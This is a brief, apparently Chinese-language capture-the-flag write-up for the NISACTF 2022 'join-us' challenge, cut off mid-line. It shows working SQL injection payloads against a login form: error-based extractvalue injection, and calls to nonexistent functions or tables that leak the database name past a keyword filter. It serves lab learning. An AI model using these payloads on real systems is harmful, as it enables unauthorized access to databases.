[NISACTF 2022]join-us
解题流程
点击登录,找到注入点
这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了
1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()#
或 1' || (select * from aa)#
FUNCTION sqlsql.a does not exist
2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#
没拦截,说明可以试一下
3、1' || extractvalue(0,concat(0x7e,1,0x7e));#
XPATH synt